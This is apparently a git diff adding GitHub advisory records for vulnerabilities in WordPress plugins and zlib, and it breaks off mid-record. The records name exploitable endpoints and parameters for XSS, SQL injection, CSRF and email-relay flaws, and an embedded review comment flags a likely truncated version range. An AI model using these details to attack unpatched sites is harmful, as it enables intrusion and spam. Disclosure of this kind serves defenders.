new file mode 100644
index 0000000000000..9f05303d25898
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fv33-cj5h-48j8/GHSA-fv33-cj5h-48j8.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fv33-cj5h-48j8",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-13959"
+ ],
+ "details": "The Filestack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'filepicker' shortcode in all versions up to, and including, 2.0.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13959"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/filepicker-media-uploader/tags/2.0.8/lib/shortcodes.php#L20"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/filepicker-media-uploader/trunk/lib/shortcodes.php#L20"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2777794d-2c0a-4843-bed8-78e607d4e796?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json b/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json
new file mode 100644
index 0000000000000..b637ccb2b2efb
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fvjg-wx7c-4qc5/GHSA-fvjg-wx7c-4qc5.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fvjg-wx7c-4qc5",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1072"
+ ],
+ "details": "The Keybase.io Verification plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.5. This is due to missing nonce validation when updating plugin settings. This makes it possible for unauthenticated attackers to update the Keybase verification text via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1072"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-keybase-verification/tags/1.4.5/admin/code/write.php#L51"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-keybase-verification/trunk/admin/code/write.php#L51"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3455171%40wp-keybase-verification&new=3455171%40wp-keybase-verification&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4bbf55eb-7738-4c52-ac9d-a67d159e56cf?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json b/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json
new file mode 100644
index 0000000000000..b2bca67c84fe9
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fx3v-rgv7-qq3x/GHSA-fx3v-rgv7-qq3x.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fx3v-rgv7-qq3x",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-1277"
+ ],
+ "details": "The URL Shortify plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.12.1 due to insufficient validation on the 'redirect_to' parameter in the promotional dismissal handler. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites via a crafted link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1277"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/url-shortify/tags/1.11.4/lite/includes/Promo.php#L64"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3451740%40url-shortify&old=3445491%40url-shortify&sfp_email=&sfph_mail=#file1049"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c7c1dc51-47ca-4b2f-9ff9-275bd8b1c106?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-601"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:24Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json b/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json
new file mode 100644
index 0000000000000..967128fbf512b
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-g4wh-mv47-2hg5/GHSA-g4wh-mv47-2hg5.json
@@ -0,0 +1,80 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g4wh-mv47-2hg5",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1304"
+ ],
+ "details": "The Membership Plugin – Restrict Content for WordPress is vulnerable to Stored Cross-Site Scripting via multiple invoice settings fields in all versions up to, and including, 3.2.18 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1304"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L896"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L905"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L914"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L923"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L932"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L941"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L950"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/includes/admin/settings/settings.php#L971"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/templates/invoice.php#L271"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/restrict-content/tags/3.2.16/core/templates/invoice.php#L281"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3448964%40restrict-content&new=3448964%40restrict-content&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cdd563b7-a1b9-4d99-9a6e-c8acf9dda619?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:34Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json b/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json
new file mode 100644
index 0000000000000..1a0c1a1a955a8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-g8mp-px4h-fw43/GHSA-g8mp-px4h-fw43.json
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g8mp-px4h-fw43", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-1714" + ], + "details": "The ShopLentor – WooCommerce Builder for Elementor & Gutenberg +21 Modules – All in One Solution plugin for WordPress is vulnerable to Email Relay Abuse in all versions up to, and including, 3.3.2. This is due to the lack of validation on the 'send_to', 'product_title', 'wlmessage', and 'wlemail' parameters in the 'woolentor_suggest_price_action' AJAX endpoint. This makes it possible for unauthenticated attackers to send arbitrary emails to any recipient with full control over the subject line, message content, and sender address (via CRLF injection in the 'wlemail' parameter), effectively turning the website into a full email relay for spam or phishing campaigns.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1714" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L189" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/tags/3.3.1/classes/class.ajax_actions.php#L192" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L170" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L189" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/woolentor-addons/trunk/classes/class.ajax_actions.php#L192" + }, + { + "type": "WEB", + "url": 
"https://plugins.trac.wordpress.org/changeset/3461704/woolentor-addons/trunk/classes/class.ajax_actions.php?contextall=1" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cf326914-6a38-4984-a2a7-66e05f41a96b?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-93" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T05:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json b/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json new file mode 100644 index 0000000000000..3f58906b72c53 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcff-gvxv-7jgm/GHSA-gcff-gvxv-7jgm.json 
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gcff-gvxv-7jgm",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1931"
+ ],
+ "details": "The Rent Fetch plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'keyword' parameter in all versions up to, and including, 0.32.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1931"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/BrindleDigital/rentfetch/commit/3c7162b24a8be5e5399c1a5bbaf0b949127aca75"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/rentfetch/tags/0.32.4/lib/admin/options-sections/options-general-section.php#L225"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/rentfetch/trunk/lib/admin/options-sections/options-general-section.php#L225"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3458366%40rentfetch&new=3458366%40rentfetch&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3fffdda5-91ed-4b79-bc04-77a1c44e3b67?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:28Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json b/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json
new file mode 100644
index 0000000000000..03403a15be506
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-ghf8-ggp8-97wj/GHSA-ghf8-ggp8-97wj.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-ghf8-ggp8-97wj",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27033"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27033"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json b/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json
new file mode 100644
index 0000000000000..c3403ed1b4840
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h858-mf2m-8jf4/GHSA-h858-mf2m-8jf4.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h858-mf2m-8jf4",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27171"
+ ],
+ "details": "zlib before 1.3.2 allows CPU consumption via crc32_combine64 and crc32_combine_gen64 because x2nmodp can do right shifts within a loop that has no termination condition.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27171"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/madler/zlib/issues/904"
+ },
+ {
+ "type": "WEB",
+ "url": "https://7asecurity.com/blog/2026/02/zlib-7asecurity-audit"
+ },
+ {
+ "type": "WEB",
+ "url": "https://7asecurity.com/reports/pentest-report-zlib-RC1.1.pdf"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/madler/zlib/releases/tag/v1.3.2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://ostif.org/zlib-audit-complete"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-1284"
+ ],
+ "severity": "LOW",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json b/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json
new file mode 100644
index 0000000000000..49abac32aeac3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jg87-hjf9-gf64/GHSA-jg87-hjf9-gf64.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jg87-hjf9-gf64",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27037"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27037"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:01Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json b/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json
new file mode 100644
index 0000000000000..a78a994cc52e4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-m3jj-4hf6-wgch/GHSA-m3jj-4hf6-wgch.json
@@ -0,0 +1,25 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-m3jj-4hf6-wgch",
+ "modified": "2026-02-18T06:30:18Z",
+ "published": "2026-02-18T06:30:18Z",
+ "aliases": [
+ "CVE-2026-27035"
+ ],
+ "details": "Rejected reason: Not used",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27035"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T04:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json b/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json
new file mode 100644
index 0000000000000..f6fa77ad5c9c7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-mcrh-3qmp-x37p/GHSA-mcrh-3qmp-x37p.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-mcrh-3qmp-x37p",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-12356"
+ ],
+ "details": "The Tickera – Sell Tickets & Manage Events plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wp_ajax_change_ticket_status' AJAX endpoint in all versions up to, and including, 3.5.6.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update post/event statuses.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12356"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/tickera-event-ticketing-system/trunk/tickera.php#L3903"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3422813"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e7c08b1a-c73d-488c-96df-cf18acb460bb?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:33Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json
new file mode 100644
index 0000000000000..6a94e565ad909
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pj33-46c7-rm7p",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-2023"
+ ],
+ "details": "The WP Plugin Info Card plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0. This is due to missing nonce validation in the ajax_save_custom_plugin() function, which is disabled by prefixing the check with 'false &&'. This makes it possible for unauthenticated attackers to create or modify custom plugin entries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2023"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/DLXPlugins/wp-plugin-info-card/blob/0fe50d3ccb3d61d5d176fab9e9f280ac8bfd8614/php/Admin/Init.php#L390"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/tags/6.2.0/php/Admin/Init.php#L390"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/trunk/php/Admin/Init.php#L390"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3454992%40wp-plugin-info-card&new=3454992%40wp-plugin-info-card&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1213a21f-a9c1-4da3-99b5-4a5a0673073f?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T06:16:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json
new file mode 100644
index 0000000000000..de9398f896eab
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qph2-xm7h-wv73/GHSA-qph2-xm7h-wv73.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qph2-xm7h-wv73",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-2576"
+ ],
+ "details": "The Business Directory Plugin – Easy Listing Directories for WordPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'payment' parameter in all versions up to, and including, 6.4.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2576"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/controllers/pages/class-checkout.php#L126"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/business-directory-plugin/tags/6.4.21/includes/db/class-db-query-set.php#L37"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3463307/business-directory-plugin/trunk/includes/db/class-db-query-set.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d8ec7d25-1574-416c-b5fd-3a71b1cc09d2?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:29Z"
+ }
+}
\ No newline at end of file
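Review bot: The affected range in `details` reads `up to, and including, 6.4.2`, yet both code references in this same record point at `tags/6.4.21` and the fix is cited as a later trunk changeset, so the version string looks truncated (possibly `6.4.21`; that value is inferred, not stated in the record). Because `"affected": []` is empty, the prose is the only range a consumer can act on, and a truncated value would under-scope an unauthenticated SQL injection rated HIGH. Confirm the range against the linked NVD and Wordfence entries before matching installs on it, and treat releases up to the cited changeset as in scope until that is settled.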
diff --git a/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json
new file mode 100644
index 0000000000000..465c984583a48
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qw9p-rfpx-fxh5/GHSA-qw9p-rfpx-fxh5.json
@@ -0,0 +1,40 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qw9p-rfpx-fxh5",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2025-12075"
+ ],
+ "details": "The Order Splitter for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wos_troubleshooting' AJAX endpoint in all versions up to, and including, 5.3.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view information pertaining to other user's orders.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12075"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3387820%40woo-order-splitter&new=3387820%40woo-order-splitter&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/627eb000-086e-408a-8123-063fed6364be?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T05:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json
new file mode 100644
index 0000000000000..889d69c0fb852
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rgq3-q5rc-mjc3/GHSA-rgq3-q5rc-mjc3.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rgq3-q5rc-mjc3",
+ "modified": "2026-02-18T06:30:19Z",
+ "published": "2026-02-18T06:30:19Z",
+ "aliases": [
+ "CVE-2026-1906"
+ ],
